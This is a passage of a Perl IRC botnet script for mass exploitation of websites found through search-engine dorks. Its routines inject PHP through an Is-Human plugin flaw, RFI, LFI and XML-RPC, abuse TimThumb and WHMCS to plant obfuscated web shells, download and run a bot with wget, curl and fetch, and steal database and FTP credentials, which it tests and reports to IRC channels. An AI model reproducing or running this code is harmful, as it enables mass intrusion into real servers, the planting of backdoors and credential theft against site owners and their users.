DBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg";
- my $ihcek = "JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK";
- my $vuln = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihxxx."));error";
- my $cekih = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihcek."));error";
- my $shell = "http://".$site."wp-content/plugins/is-human/lobex.php";
- my $coba = &get_content($cekih);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($coba =~ /Array<br>(.*?)<br>(.*?)gid=/){ my $uname = $1; my $uid = $2; &get_content($vuln);sleep(1);
- &msg("$chan","$ihlogo $engine Exploiting http://$site ");
- my $res = &get_content($shell);sleep(1);
- if ($res =~ /UnKnown - Simple Shell/){
- &msg("$chan","$ihlogo $engine <=> SheLL <=> $shell ");
- } else { &msg("$chan","$ihlogo $engine <=> Vuln <=> $site <=> Os=$uname $uid ");
- }
- }
- } exit;
- }
- }
- }
- }
- sub rfi_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$rfilogo $engine Finished for $dork "); }
- my $coba = "http://".$site.$bug."test??";
- my $test = "http://".$site.$bug.$injector."??";
- my $dor = "http://".$site.$bug.$botshell."??";
- my $cek = &get_content($coba);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- &get_content($dor);sleep(1);
- if ($cek =~ /failed to open stream/) {
- my $check = &get_content($test);sleep(1);
- if ($check =~ /stunshell/i) {
- &os2($test,$chan,$engine,$rfilogo);
- }
- }
- } exit;
- }
- }
- }
- }
- sub lfi_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$lfilogo $engine Finished for $dork "); }
- my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../";
- my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
- my $shell = "http://".$site.$bug.$dir."/tmp/lobex%0000";
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
- my $res = lfi_env_query($test);
- # &lfi_spread_query($test);
- if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS/) {
- my $os = $1;
- my $uid = $2;
- my $lficheck = &get_content($shell);
- if ($lficheck =~ /UnKnown - Simple Shell/){
- &msg("$chan","$lfilogo $engine <=> SheLL <=> $shell (OS=$os) $uid ");
- } else {
- &msg("$chan","$lfilogo $engine <=> Vuln <=> $site (OS=$os) $uid ");
- }
- }
- }
- } exit; }
- }
- }
- }
- sub lfi_env_query() {
- my $url = $_[0];
- my $code = 'JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWxkUXVOVEZIMHVFdjl1bUZPeW93V0hla2gyQldScEtURWxkeUUwUWZvQ3lHWHNWaktMUGJaenhuRkd4SC92dlROcFZaYUYwbmZ6RXVmZVpyL09uTGxCOTNDNUtHcHFGRWFLRnlKRk9wYmFlaC92N2pBcEN4bFdTUlpGWmpGcUQ5SElkTVRkNDFjeDdiYWlNQWpEd2ZEeTJwbkduK003NTdiZC91RnVhcWRvenhYWFZrUUpXbnhsQ0U2dEpadkNJd2FNL2dwVDEvUjhQTDZLem9maG1ONmltNHZQVys1RThPY2tDTWZSY1RTd2dIYVJyZ0JPNHpRbXEwdk1DVkd3VVpNYmdha3huaUpaeFRPV0g2WU1vSis0NE5FY3VtZlFHT1ZTeXB4by8zaGdtenkwRkZncXlmVUswb2NuZEU1bk1ld0hrR0JyYVZPUEg0R0ZXYkZLUTVjQU1xV1pMSm4wb2VLaVEyMjZFbVRPM1BWUmp2Mk9RZnI5RWRCSHo4enVaeUVoeVZoT28rQnZPQTQyZ3ZLWWRDNjFzOE9oeEJJaVA4M1I2aVZTUWZjSk5WblJmVzBlSzU2UlgvRkxiMDRXVFpkVW5VSERGYkRXakdZakJrb2tjZktlYmlQMUZEZUNnR2hEbHdGbTB5czFuVDg3OXZxVW44aHRobXYzenJERWRHRWpuZCtDOGJXVGNZVmdLQnRIalNvcW1iQmFIVGpoNlhWak5ZN09CbjhFbHljWGdYQzBrREtsT2ZHZlEvM2g2ZVFpdUJ4VW8rRmo3Tnh0dExNc0Q3aFZzZ3FnK0t4clhuUE1BNW1qVnlTek5OdHQrOFFtZWRzQnZxT0VqdDRrb1NNcklRQWxpNExRcnVZNmNMMkorRjBVV0U0T1ZYVnRKK0dDY2t5M2NMMDRVZzJmRldQSkZQK2IrVCtScE1qZ3RINzhZRDY5N3JSVXZXaGFqMms3UnJCV0U5d0NjRWZCYnZ2VXBSNk1HSUVCYTlIRzZMWTkybjU0alFrRXdCQVZRbjJUS1YvQkkzRkxsL0FvbVQ4NTUxODdOOXR0UmowOFBDaFY4VGlqeWh4eWV6dk5yQktKaGtoVHlpVVVJNml0Y1puYWU1YWd5U3F4U1BsWFdFd1d5bEwvdnROa2pCQ05lQTk5R1JQRzFUNXJqdzdKWnlVRlRvc0g0T1p4SHpic1UrVzEvVnNsWVdIK1dBMUF2MXlrTG9TVU9VQ1p6RmFPZUFTWXZzSzlWMi9EZ1VKMjcyaFBRb3M4ajFMYUVOamxvcXcwMGF1UytVZXpMNW9TNU5pblZwN1NlbUpMV21iKzVMZHNLTG1QczhyOHZnTjhCenZyT2NmYm5USTRJSk1pcnpMTldHdmhHTnhPR3V1NDZid1pCNmY1bHhFbWNrbkVLVG5qR1ROd1p4RDllWm9GUWtZbTZtR1Y3WDBMTUlQNDJvM2F4SiswcnZuQmMzdTFpMWkyTk5GVWNiT0pqZnpJcG8xKy8xaGRWTEFsUGtPU2NiRkZ2bzYzQW5tVHRZOUI5WnBiTy9BV3ZSdXJGUm03YVhsanMxd3JFNUZsM1BMbDB4M1llSmsrbXBpNkhRaHRNQTZ6akdUN2h0ZEJVSWxtQ3pnRE1qck1pM3NXMmV3c2pSRGdmak5SNTNKeHcyRGpycnZ4V1ptNm1lK1NDcWUxZTZSRUJid2RUSXA3NFpIWVVsbTIvRzZWSlBEWGgzVXdiRituZytWbzFDZjBtRHlhMi9hTTVFMzBEY3RqVkF4eXRUTkN6UnVyWG5pbGNac0srcmxFMEtINXdMSkp1T01qOW9VbExuTXlXODJLcUlPeFovTVZXUDVVUlNkRzVDQ0xuUmNTZit6OUF3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcvdG1wL2xvYmV4JywndycpOwpmd3JpdGUoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTsK';
- my $ua = LWP::UserAgent->new(agent => "<?echo 'c0li#'.php_uname().'#c0li'.get_current_user();eval(base64_decode('".$code."'));echo 'SUCCESS';?>");
- $ua->timeout(7);
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- return $res->content;
- }
- sub xml_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$xmllogo $engine Finished for $dork "); }
- my $test = "http://".$site.$bug;
- my $vuln = "http://".$site." 12".$bug;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /faultcode/i ) {
- my $resp = &xml_cek_query2($test);
- if ($resp =~ /Byroe(.*)Lobex/s) {
- # &xml_spread_query($test);sleep(1);
- my $sys = $1;
- my $shell = "http://".$site."/lobex.php";
- my $check = &get_content($shell);
- if ($check =~ /UnKnown - Simple Shell/) {
- my $safe = ""; my $os = ""; my $uid = "";
- if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
- if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
- if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
- &msg("$chan","$xmllogo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$admin","$xmllogo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- }
- # else {
- # &msg("$chan"," 0,1$xmllogo( 4@ 8$engine 15) 15( 13@ 12SysTem 15) 10 ".$vuln." 3".$sys); sleep(1);}
- }
- }
- } exit;
- }
- }
- }
- }
- sub xml_cek_query() {
- my $url = $_[0];
- my $code = "system('uname -a');";
- my $ua = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
- $ua->timeout(7);
- my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
- return $res->content;
- }
- sub xml_cek_query2() {
- my $url = $_[0];
- my $string = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg==";
- my $ua = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode('$string'));echo 'Lobex';exit;/*</name></value></param></params></methodCall>";
- $ua->timeout(7);
- my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
- return $res->content;
- }
- sub xml_spread_query() {
- my $xmltargt = $_[0];
- my $xmlsprd = "system('wget ".$injector." -O lobex.php;fetch ".$injector.";mv bad.txt lobex.php;wget ".$botshell." -O tmp.php;fetch ".$botshell.";mv bot.txt tmp.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;');";
- my $userAgent = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
- $userAgent->timeout(7);
- my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
- }
- sub thumb_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- my $vuln = "http://".$site.$bug."?src=".$thumbshell;
- my $botis = "http://".$site.$bug."?src=".$botid;
- my $botxc = "http://".$site.$bug."?src=".$botxid;
- my @nbug = split(/\//,$bug);
- my $cek = &get_content($vuln);
- if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
- if ($cek =~ /Unable to open image(.*?)$nbug[0](.*?)$md5php/i){
- &msg("$chan","$thumblogo $engine Exploiting http://$site ");
- my $pdir = $2;
- if ($spreadMode == 1) { &get_content($botis); &get_content($botxc);sleep(1); }
- my $crut = "http://".$site.$nbug[0].$pdir.$md5php;
- my $botc = "http://".$site.$nbug[0].$pdir.$md5bot;
- my $botpc = "http://".$site.$nbug[0].$pdir.$md5botx;
- my $npath = "http://".$site."wp-includes/wp-script.php";
- my $check = &get_content($crut."?clone");sleep(1);
- if ($check =~ /stunshell/i){
- my $safe = ""; my $os = ""; my $uid = "";
- if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
- if ($check =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
- my $crot = &get_content($npath);sleep(1);
- if ($crot =~ /stunshell/i){
- &msg("$admin","$thumblogo $engine <=> sHeLL <=> ".$npath." (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chanxxx","$thumblogo $engine <=> sHeLL <=> ".$npath." (SafeMode=$safe) (OS=$os) uid=$uid ");
- } else {
- &msg("$admin","$thumblogo $engine <=> sHeLL <=> ".$crut." (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$thumblogo $engine <=> sHeLL <=> ".$crut." (SafeMode=$safe) (OS=$os) uid=$uid ");
- }
- &get_content($botc);sleep(1);
- &get_content($botpc);sleep(1);
- }
- }
- } exit; }
- if ($count == $num-1) { &msg("$chan","$thumblogo $engine Finished for $dork "); }
- }
- }
- }
- sub whmcs_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$whmcslogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$whmcslogo $engine Finished for $dork "); }
- my $test1 = "http://".$site.$bug."../../../configuration.php%00";
- my $submit = "http://".$site.$subticket;
- my $html = &get_content($test1);
- if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
- if ($html =~ /db_host/i) {
- my $userpass = &getUserPass($html); sleep(2);
- my $info = &getinfo($html); sleep(2);
- &msg("$chaninfo","$whmcslogo $engine <=> info [http://".$site."] $info");
- my $lulz = "http://".$site;
- my $user = ""; my $pass = ""; my $user2 = ""; my $pass2 = ""; my $dtbs2 = "";
- if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
- my $host = $2;
- my @ftpu = split(":Viva-Byroe.Net:", $userpass);
- my @dbic = split(":Viva-Byroe.Net:", $info);
- $user = $ftpu[0]; $pass = $ftpu[1];
- $user2 = $dbic[0]; $pass2 = $dbic[1]; $dtbs2 = $dbic[2];
- my $ftpstat = "";
- if($user =~ /_/) { @userz = split("_", $user); $user = $userz[0];}
- &ftp_connect($test1,$host,$user,$pass,$chan,$engine,$whmcslogo);sleep(1);
- &dbi_connect($host,$user2,$pass2,$dtbs2,$chan,$engine,$whmcslogo);sleep(1);
- }
- my $ceksubmit = &get_content($submit);
- if ($ceksubmit =~ /Urgency/i) {
- &msg("$submitchan","$whmcslogo $engine <=> Submit Ticket [".$submit."]"); sleep(2);
- my $uploader = "http://".$site."/downloads/indexx.php";
- my $uploader2 = "http://".$site."/templates_c/indexx.php";
- my $cekup = &get_content($uploader);
- my $cekup2 = &get_content($uploader2);
- if ($cekup =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader."]");&msg("$admin","$whmcslogo $engine <=> Uploader [".$uploader."]"); }
- if ($cekup2 =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader2."]");&msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader2."]"); }
- }
- }
- } exit;
- }
- }
- }
- }
- sub ftp_connect {
- my $url = $_[0];
- my $host = $_[1];
- my $user = $_[2];
- my $pass = $_[3];
- my $chan = $_[4];
- my $engine = $_[5];
- my $logo = $_[6];
- my $success = 1;
- use Net::FTP;
- my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7);
- $success = 0 if $ftp->login($user,$pass);
- $ftp->quit;
- if ($success == 0) {
- &msg("$chanxxx","$logo $engine <=> FTP [http://".$host."] [".$user.":".$pass."]");
- }
- }
- sub dbi_connect () {
- my $host = $_[0];
- my $user = $_[1];
- my $pass = $_[2];
- my $dtbs = $_[3];
- my $chan = $_[4];
- my $engine = $_[5];
- my $logo = $_[6];
- my $port = "3306";
- my $platform = "mysql";
- my $dsn = "dbi:$platform:$dtbs:$host:$port";
- my $DBIconnect= DBI->connect($dsn,$user,$pass);
- if ($DBIconnect) {
- &msg("$chanxxx","$logo $engine <=> MySql [http://".$host."] [Connected]");
- }
- }
- sub getUserPass() {
- my $string = $_[0];
- my @lol = split("\r\n", $string);
- my $pass = "";
- my $user = "";
- foreach my $line (@lol) {
- if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
- $pass = $3;
- }
- if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
- $user = $3;
- }
- }
- return $user.":Viva-Byroe.Net:".$pass;
- }
- sub getinfo() {
- my $string = $_[0];
- my @lol = split("\r\n", $string);
- my $pass = "";
- my $user = "";
- my $dbs = "";
- foreach my $line (@lol) {
- if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
- $pass = $3;
- }
- if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
- $user = $3;
- }
- if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_name(.*?)=(.*?)"(.+?)";/i)) {
- $dbs = $3;
- }
- }
- return $user.":Viva-Byroe.Net:".$pass.":Viva-Byroe.Net:".$dbs;
- }
- sub zero_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zerologo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$zerologo $engine Finished for $dork "); }
- my $coba = "http://".$site.$bug;
- my $cek = &get_content($coba);sleep(1);
- if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
- if ($cek =~ /Zeroboard/) { system("./zbc $coba 80");sleep(1);
- my $vulner1 = "http://".$site.$action."?cmd=";
- my $vulner2 = "http://".$site.$action.$wgetdon;
- my $vulner3 = "http://".$site.$action.$lwpdon;
- my $vulner4 = "http://".$site.$action.$curldon;
- my $vuln1 = "http://".$site."/data/kekkaishi.php";
- my $check2 = &get_content($vulner1);
- if ($check2 =~ /Byroe Team/) {
- if ($zerowget == 1) { my $coba1 = &get_content($vulner2);sleep(2); }
- if ($zerolwp == 1 ) { my $coba2 = &get_content($vulner3);sleep(2); }
- if ($zerocurl == 1) { my $coba3 = &get_content($vulner4);sleep(2); }
- my $check1 = &get_content($vuln1);
- if ($check1 =~ /stunshell/i) {
- my $safe = ""; my $os = ""; my $uid = "";
- if ($check1 =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
- if ($check1 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$zerologo $engine <=> sHeLL <=> ".$vuln1." (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$zerologo $engine <=> sHeLL <=> ".$vuln1." (SafeMode=$safe) (OS=$os) uid=$uid ");
- } else {
- &msg("$chan","$zerologo $engine <=> Cek dewe $vulner1 ");
- } sleep(2);
- }
- }
- } exit; }
- }
- }
- }
- ##################################################################################
- sub search_engine() {
- my (@total,@clean);
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $logo = $_[4];
- if ($gps == 1) {
- if ($engine eq "JacKAE") { my @jackae = &jack1($dork."+site:ae"); push(@total,@jackae); }
- if ($engine eq "JacKAR") { my @jackar = &jack2($dork."+site:ar"); push(@total,@jackar); }
- if ($engine eq "JacKAT") { my @jackat = &jack3($dork."+site:at"); push(@total,@jackat); }
- if ($engine eq "JacKAU") { my @jackau = &jack4($dork."+site:au"); push(@total,@jackau); }
- if ($engine eq "JacKBR") { my @jackbr = &jack5($dork."+site:br"); push(@total,@jackbr); }
- if ($engine eq "JacKCA") { my @jackca = &jack1($dork."+site:ca"); push(@total,@jackca); }
- if ($engine eq "JacKCL") { my @jackcl = &jack2($dork."+site:cl"); push(@total,@jackcl); }
- if ($engine eq "JacKCN") { my @jackcn = &jack3($dork."+site:cn"); push(@total,@jackcn); }
- if ($engine eq "JacKCoM") { my @jackcom = &jack4($dork."+site:com"); push(@total,@jackcom); }
- if ($engine eq "JacKCZ") { my @jackcz = &jack5($dork."+site:cz"); push(@total,@jackcz); }
- if ($engine eq "JacKDE") { my @jackde = &jack1($dork."+site:de"); push(@total,@jackde); }
- if ($engine eq "JacKDK") { my @jackdk = &jack2($dork."+site:dk"); push(@total,@jackdk); }
- if ($engine eq "JacKES") { my @jackes = &jack3($dork."+site:es"); push(@total,@jackes); }
- if ($engine eq "JacKEU") { my @jackeu = &jack4($dork."+site:eu"); push(@total,@jackeu); }
- if ($engine eq "JacKFR") { my @jackfr = &jack5($dork."+site:fr"); push(@total,@jackfr); }
- if ($engine eq "JacKHU") { my @jackhu = &jack1($dork."+site:hu"); push(@total,@jackhu); }
- if ($engine eq "JacKID") { my @jackid = &jack2($dork."+site:id"); push(@total,@jackid); }
- if ($engine eq "JacKIL") { my @jackil = &jack3($dork."+site:il"); push(@total,@jackil); }
- if ($engine eq "JacKIN") { my @jackin = &jack4($dork."+site:in"); push(@total,@jackin); }
- if ($engine eq "JacKInfO") { my @jackinfo = &jack5($dork."+site:info"); push(@total,@jackinfo); }
- if ($engine eq "JacKIR") { my @jackir = &jack1($dork."+site:ir"); push(@total,@jackir); }
- if ($engine eq "JacKIT") { my @jackit = &jack2($dork."+site:it"); push(@total,@jackit); }
- if ($engine eq "JacKJP") { my @jackjp = &jack3($dork."+site:jp"); push(@total,@jackjp); }
- if ($engine eq "JacKKR") { my @jackkr = &jack4($dork."+site:kr"); push(@total,@jackkr); }
- if ($engine eq "JacKMX") { my @jackmx = &jack5($dork."+site:mx"); push(@total,@jackmx); }
- if ($engine eq "JacKMY") { my @jackmy = &jack1($dork."+site:my"); push(@total,@jackmy); }
- if ($engine eq "JacKNeT") { my @jacknet = &jack2($dork."+site:net"); push(@total,@jacknet); }
- if ($engine eq "JacKNL") { my @jacknl = &jack3($dork."+site:nl"); push(@total,@jacknl); }
- if ($engine eq "JacKOrG") { my @jackorg = &jack4($dork."+site:org"); push(@total,@jackorg); }
- if ($engine eq "JacKPH") { my @jackph = &jack5($dork."+site:ph"); push(@total,@jackph); }
- if ($engine eq "JacKPL") { my @jackpl = &jack1($dork."+site:pl"); push(@total,@jackpl); }
- if ($engine eq "JacKRO") { my @jackro = &jack2($dork."+site:ro"); push(@total,@jackro); }
- if ($engine eq "JacKRU") { my @jackru = &jack3($dork."+site:ru"); push(@total,@jackru); }
- if ($engine eq "JacKTH") { my @jackth = &jack4($dork."+site:th"); push(@total,@jackth); }
- if ($engine eq "JacKUA") { my @jackua = &jack5($dork."+site:ua"); push(@total,@jackua); }
